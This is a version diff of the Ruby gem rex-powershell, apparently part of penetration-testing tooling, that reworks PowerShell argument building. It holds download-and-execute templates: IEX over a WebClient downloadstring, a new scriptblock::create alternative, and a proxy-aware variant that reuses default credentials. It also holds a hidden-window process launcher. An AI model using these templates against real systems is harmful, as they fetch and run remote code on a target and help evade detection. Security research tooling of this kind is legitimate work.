rex-powershell 0.1.73 → 0.1.74

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 1dabfcb498065064e37785310bca6d72de12557c
-  data.tar.gz: a5be528fbbc94aae94674a877f2559ad9d500406
+  metadata.gz: b88e31ce42aa0f6b8b9849c916f24680f156fb59
+  data.tar.gz: '0395b6d9bf3e79c7edfaff20e36b049c5df254c7'
 SHA512:
-  metadata.gz: 199779368f7e1a874ee587bc916246388c2ad03f1dfffa72877df2e108d34a2becc077f93b6389225016311905eac50d616bf6f34abf8491a0ef4f7866254582
-  data.tar.gz: 5feb09f1183726d10b1caf649fc7d8f43236e96ddb27dcf1aac0defc7d351bc6d44d2d21756b7c095c4adb6378b0c62cfd06867227f870aec27334d021df4298
+  metadata.gz: 5b295b9d04daf9e4b7d39b80ed60ecfd70392c0b45c3337ad39848482f53e5499d30a08f33e9cb72e2a2a6026ca01ce05a1046baa81e0f449e36c9fee0aedec4
+  data.tar.gz: ae1d2be6edc876b9ec72a408ac466b2e5d73823a34f46c7f46e4033296d4b55730492f315706234d75723cd72107820eaa2b60aa3670825b26d0f41c95f29ded

data/lib/rex/powershell/command.rb

@@ -135,8 +135,6 @@ module Command
     arg_string = ' '
     opts.each_pair do |arg, value|
       case arg
-        when :encodedcommand
-          arg_string << "-EncodedCommand #{value} " if value
         when :executionpolicy
           arg_string << "-ExecutionPolicy #{value} " if value
         when :inputformat
@@ -164,11 +162,13 @@ module Command
 
     # Command must be last (unless from stdin - etc)
     if opts[:command]
-      if opts[:use_single_quotes]
-        arg_string << "-Command #{opts[:command]}"
-      else
+      if opts[:wrap_double_quotes]
         arg_string << "-Command \"#{opts[:command]}\""
+      else
+        arg_string << "-Command #{opts[:command]}"
       end
+    elsif opts[:encodedcommand]
+      arg_string << "-EncodedCommand #{opts[:encodedcommand]}"
     end
 
     # Shorten arg if PSH 2.0+
@@ -218,18 +218,15 @@ module Command
 
     if encoded
       opts[:encodedcommand] = ps_code
-    elsif opts[:use_single_quotes]
-      opts[:command] = ps_code.gsub("'", "''")
     else
-      opts[:command] = ps_code
+      opts[:command] = ps_code.gsub("'", "''")
+      opts[:wrap_double_quotes]  = false
     end
 
-    ps_args = generate_psh_args(opts)
-
     process_start_info = <<EOS
 $s=New-Object System.Diagnostics.ProcessStartInfo
 $s.FileName=$b
-$s.Arguments='#{ps_args}'
+$s.Arguments='#{generate_psh_args(opts)}'
 $s.UseShellExecute=$false
 $s.RedirectStandardOutput=$true
 $s.WindowStyle='Hidden'
@@ -248,7 +245,11 @@ EOS
 
     archictecure_detection.gsub!("\n", '')
 
-    archictecure_detection + process_start_info
+    if opts[:no_arch_detect]
+      return   "$b='powershell.exe';#{process_start_info}"
+    else
+      archictecure_detection + process_start_info
+    end
   end
 
   #
@@ -272,8 +273,8 @@ EOS
   #   powershell script
   # @option opts [Boolean] :remove_comspec Removes the %COMSPEC%
   #   environment variable at the start of the command line
-  # @option opts [Boolean] :use_single_quotes Wraps the -Command
-  #   argument in single quotes unless :encode_final_payload
+  # @option opts [Boolean] :wrap_double_quotes Wraps the -Command
+  #   argument in double quotes unless :encode_final_payload
   # @option opts [TrueClass,FalseClass] :exec_in_place Removes the
   #   executable wrappers from the powershell code returning raw PSH
   #   for executing with an existing PSH context
@@ -359,13 +360,6 @@ EOS
         end
       end
     else
-      if opts[:use_single_quotes]
-        # Escape Single Quotes
-        final_payload.gsub!("'", "''")
-        # Wrap command in quotes
-        final_payload = "'#{final_payload}'"
-      end
-
       command_args[:command] = final_payload
     end
 

data/lib/rex/powershell/psh_methods.rb

@@ -77,10 +77,15 @@ module Powershell
     # Download and execute string via HTTP
     #
     # @param url [String] string to download
+    # @param iex [Boolean] utilize invoke-expression to execute code
     #
     # @return [String] PowerShell code to download and exec the url
-    def self.download_and_exec_string(url)
-      %Q^ IEX ((new-object net.webclient).downloadstring('#{url}'))^
+    def self.download_and_exec_string(url, iex = true)
+      if iex
+        %Q^ IEX ((new-object net.webclient).downloadstring('#{url}'))^
+      else
+        %Q^&([scriptblock]::create((new-object net.webclient).downloadstring('#{url}')))^
+      end
     end
 
     #
@@ -88,14 +93,19 @@ module Powershell
     # as a string and execute the contents as PowerShell
     #
     # @param url [String] string to download
+    # @param iex [Boolean] utilize invoke-expression to execute code
     #
     # @return [String] PowerShell code to download a URL
-    def self.proxy_aware_download_and_exec_string(url)
+    def self.proxy_aware_download_and_exec_string(url, iex = true)
       var = Rex::Text.rand_text_alpha(1)
       cmd = "$#{var}=new-object net.webclient;"
       cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
       cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
-      cmd << "IEX $#{var}.downloadstring('#{url}');"
+      if iex
+        cmd << "IEX $#{var}.downloadstring('#{url}');"
+      else
+        cmd << "&([scriptblock]::create($#{var}.downloadstring('#{url}'));"
+      end
       cmd
     end
   end

data/lib/rex/powershell/version.rb

@@ -1,5 +1,5 @@
 module Rex
   module Powershell
-    VERSION = "0.1.73"
+    VERSION = "0.1.74"
   end
 end

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-powershell
 version: !ruby/object:Gem::Version
-  version: 0.1.73
+  version: 0.1.74
 platform: ruby
 authors:
 - David 'thelightcosine' Maloney
@@ -88,7 +88,7 @@ cert_chain:
   G+Hmcg1v810agasPdoydE0RTVZgEOOMoQ07qu7JFXVWZ9ZQpHT7qJATWL/b2csFG
   8mVuTXnyJOKRJA==
   -----END CERTIFICATE-----
-date: 2017-07-17 00:00:00.000000000 Z
+date: 2017-08-24 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: bundler